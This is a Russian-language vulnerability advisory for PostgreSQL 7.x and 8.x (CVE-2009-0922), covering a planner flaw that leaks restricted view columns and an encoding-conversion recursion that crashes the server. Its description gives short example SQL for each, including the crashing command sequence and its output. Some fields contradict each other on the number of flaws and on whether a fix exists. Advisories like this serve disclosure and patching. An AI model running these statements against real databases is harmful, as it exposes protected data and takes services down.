Несколько уязвимостей в PostgreSQL
| Дата публикации: | 18.03.2009 |
| Дата изменения: | 13.04.2009 |
| Всего просмотров: | 2669 |
| Опасность: | Низкая |
| Наличие исправления: | Частично |
| Количество уязвимостей: | 1 |
| CVE ID: | CVE-2009-0922 |
| Вектор эксплуатации: | Локальная сеть |
| Воздействие: |
Отказ в обслуживании Раскрытие важных данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: |
PostgreSQL 8.x
PostgreSQL 7.x |
| Уязвимые версии: PostgreSQL версии до 7.4.25 PostgreSQL 8.3.6, возможно другие версии. Описание: 1. Уязвимость существует в планировщике при выполнении функций с низким приоритетом вместе с видами. Злоумышленник может с помощью специально сформированной функции просмотреть содержимое запрещенных для просмотра колонок. Пример: CREATE OR REPLACE FUNCTION do_tell(anyelement) SELECT * FROM restricted_view WHERE do_tell(secret_column); 2. Уязвимость существует из-за рекурсивной ошибки при конвертации кодировок. Злоумышленник может с помощью специально сформированного SQL запроса аварийно завершить работу приложения. Пример:test=# CREATE DEFAULT CONVERSION test1 FOR 'LATIN1' TO 'KOI8' FROM ascii_to_mic; CREATE CONVERSION test=# CREATE DEFAULT CONVERSION test2 FOR 'KOI8' TO 'LATIN1' FROM mic_to_ascii; CREATE CONVERSION test=# set client_encoding to 'LATIN1'; server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request. URL производителя: www.postgresql.org Решение: Уязвимость #2 исправлена в версиях 8.3.7, 8.2.13, 8.1.17, 8.0.21 и 7.4.25. Способов устранения уязвимости не существует в настоящее время. Журнал изменений:
13.04.2009 |
|
| Ссылки: |
http://archives.postgresql.org/pgsql-hackers/2009-02/msg00861.php http://archives.postgresql.org/pgsql-bugs/2009-02/msg00172.php |